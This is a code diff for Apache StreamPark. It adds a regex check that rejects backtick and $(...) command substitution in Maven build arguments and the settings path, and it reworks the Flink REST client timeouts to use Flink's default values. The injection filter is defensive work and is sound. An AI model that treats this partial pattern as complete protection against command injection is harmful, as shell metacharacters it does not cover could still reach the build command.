diff --git a/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java b/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java index 882d94f19f..3ccbdac925 100644 --- a/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java +++ b/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java @@ -46,6 +46,8 @@ import java.util.ArrayList; import java.util.Date; import java.util.List; +import java.util.regex.Matcher; +import java.util.regex.Pattern; import java.util.stream.Collectors; @Slf4j @@ -210,39 +212,49 @@ public String getMavenArgs() { StringBuilder cmdBuffer = new StringBuilder(mvn).append(" clean package -DskipTests "); if (StringUtils.isNotBlank(this.buildArgs)) { - List dangerArgs = getDangerArgs(this.buildArgs); - if (dangerArgs.isEmpty()) { + String dangerArgs = getDangerArgs(this.buildArgs); + if (dangerArgs == null) { cmdBuffer.append(this.buildArgs.trim()); } else { throw new IllegalArgumentException( String.format( - "Invalid build args, dangerous operation symbol detected: %s, in your buildArgs: %s", - dangerArgs.stream().collect(Collectors.joining(",")), this.buildArgs)); + "Invalid maven argument, dangerous args: %s, in your buildArgs: %s", + dangerArgs, this.buildArgs)); } } String setting = InternalConfigHolder.get(CommonConfig.MAVEN_SETTINGS_PATH()); if (StringUtils.isNotBlank(setting)) { - List dangerArgs = getDangerArgs(setting); - if (dangerArgs.isEmpty()) { + String dangerArgs = getDangerArgs(setting); + if (dangerArgs == null) { File file = new File(setting); if (file.exists() && file.isFile()) { cmdBuffer.append(" --settings ").append(setting); } else { throw new IllegalArgumentException( - String.format("Invalid maven setting path, %s no exists or not file", setting)); + String.format("Invalid maven-setting file path, %s no exists or not file", setting)); } } else { throw new IllegalArgumentException( String.format( - "Invalid maven setting path, dangerous operation symbol detected: %s, in your maven setting path: %s", - dangerArgs.stream().collect(Collectors.joining(",")), setting)); + "Invalid maven-setting file path, dangerous args: %s, in your maven setting path: %s", + dangerArgs, setting)); } } return cmdBuffer.toString(); } - private List getDangerArgs(String param) { + private String getDangerArgs(String param) { + Pattern pattern = Pattern.compile("(`.*?`)|(\\$\\((.*?)\\))"); + Matcher matcher = pattern.matcher(param); + if (matcher.find()) { + String dangerArgs = matcher.group(1); + if (dangerArgs == null) { + dangerArgs = matcher.group(2); + } + return dangerArgs; + } + String[] args = param.split("\\s+"); List dangerArgs = new ArrayList<>(); for (String arg : args) { @@ -263,7 +275,10 @@ private List getDangerArgs(String param) { } } } - return dangerArgs; + if (!dangerArgs.isEmpty()) { + return dangerArgs.stream().collect(Collectors.joining(",")); + } + return null; } @JsonIgnore diff --git a/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala b/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala index e7d673628f..63d5e8c64d 100644 --- a/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala +++ b/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala @@ -59,8 +59,8 @@ object FlinkSessionSubmitHelper extends Logger { // upload flink-job jar val uploadResult = Request .post(s"$jmRestUrl/jars/upload") - .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)) - .responseTimeout(Timeout.ofSeconds(60)) + .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC) + .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC) .body( MultipartEntityBuilder .create() @@ -90,8 +90,8 @@ object FlinkSessionSubmitHelper extends Logger { // refer to https://ci.apache.org/projects/flink/flink-docs-stable/docs/ops/rest_api/#jars-upload val resp = Request .post(s"$jmRestUrl/jars/${jarUploadResponse.jarId}/run") - .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)) - .responseTimeout(Timeout.ofSeconds(60)) + .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC) + .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC) .body(new StringEntity(Serialization.write(new JarRunRequest(flinkConfig)))) .execute .returnContent() diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala index d10f81b9f0..916096f259 100644 --- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala +++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala @@ -31,22 +31,22 @@ import org.apache.flink.client.program.ClusterClient import org.apache.flink.configuration.{Configuration, DeploymentOptions, RestOptions} import org.apache.flink.kubernetes.KubernetesClusterDescriptor import org.apache.flink.kubernetes.configuration.KubernetesConfigOptions +import org.apache.hc.core5.util.Timeout import javax.annotation.Nullable -import java.time.Duration - import scala.collection.JavaConverters._ import scala.util.{Failure, Success, Try} object KubernetesRetriever extends Logger { // see org.apache.flink.client.cli.ClientOptions.CLIENT_TIMEOUT} - val FLINK_CLIENT_TIMEOUT_SEC = 60L + val FLINK_CLIENT_TIMEOUT_SEC: Timeout = + Timeout.ofMilliseconds(ClientOptions.CLIENT_TIMEOUT.defaultValue().toMillis) + // see org.apache.flink.configuration.RestOptions.AWAIT_LEADER_TIMEOUT - val FLINK_REST_AWAIT_TIMEOUT_SEC = 30L - // see org.apache.flink.configuration.RestOptions.RETRY_MAX_ATTEMPTS - val FLINK_REST_RETRY_MAX_ATTEMPTS = 30 + val FLINK_REST_AWAIT_TIMEOUT_SEC: Timeout = + Timeout.ofMilliseconds(RestOptions.AWAIT_LEADER_TIMEOUT.defaultValue()) /** get new KubernetesClient */ @throws(classOf[KubernetesClientException]) @@ -70,9 +70,11 @@ object KubernetesRetriever extends Logger { val flinkConfig = new Configuration() flinkConfig.setString(DeploymentOptions.TARGET, executeMode.toString) flinkConfig.setString(KubernetesConfigOptions.CLUSTER_ID, clusterId) - flinkConfig.set(ClientOptions.CLIENT_TIMEOUT, Duration.ofSeconds(FLINK_CLIENT_TIMEOUT_SEC)) - flinkConfig.setLong(RestOptions.AWAIT_LEADER_TIMEOUT, FLINK_REST_AWAIT_TIMEOUT_SEC * 1000) - flinkConfig.setInteger(RestOptions.RETRY_MAX_ATTEMPTS, FLINK_REST_RETRY_MAX_ATTEMPTS) + flinkConfig.set(ClientOptions.CLIENT_TIMEOUT, ClientOptions.CLIENT_TIMEOUT.defaultValue()) + flinkConfig.set( + RestOptions.AWAIT_LEADER_TIMEOUT, + RestOptions.AWAIT_LEADER_TIMEOUT.defaultValue()) + flinkConfig.set(RestOptions.RETRY_MAX_ATTEMPTS, RestOptions.RETRY_MAX_ATTEMPTS.defaultValue()) if (Try(namespace.isEmpty).getOrElse(true)) { flinkConfig.setString( KubernetesConfigOptions.NAMESPACE, diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala index 5ac00db541..a35da009c5 100644 --- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala +++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala @@ -115,8 +115,8 @@ class FlinkCheckpointWatcher(conf: MetricWatcherConfig = MetricWatcherConfig.def Checkpoint.as( Request .get(s"$flinkJmRestUrl/jobs/${trackId.jobId}/checkpoints") - .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)) - .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)) + .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC) + .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC) .execute .returnContent .asString(StandardCharsets.UTF_8)) match { diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala index 7dbfcfd0a0..927ffc01d4 100644 --- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala +++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala @@ -266,8 +266,8 @@ class FlinkJobStatusWatcher(conf: JobStatusWatcherConfig = JobStatusWatcherConfi val jobDetails = JobDetails.as( Request .get(s"$restUrl/jobs/overview") - .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)) - .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)) + .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC) + .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC) .execute .returnContent() .asString(StandardCharsets.UTF_8)) diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala index 8fc80a33a3..7a57063bd5 100644 --- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala +++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala @@ -127,8 +127,8 @@ class FlinkMetricWatcher(conf: MetricWatcherConfig = MetricWatcherConfig.default .as( Request .get(s"$flinkJmRestUrl/overview") - .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)) - .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)) + .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC) + .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC) .execute .returnContent .asString(StandardCharsets.UTF_8)) @@ -140,8 +140,8 @@ class FlinkMetricWatcher(conf: MetricWatcherConfig = MetricWatcherConfig.default .as( Request .get(s"$flinkJmRestUrl/jobmanager/config") - .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)) - .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)) + .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC) + .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC) .execute .returnContent .asString(StandardCharsets.UTF_8))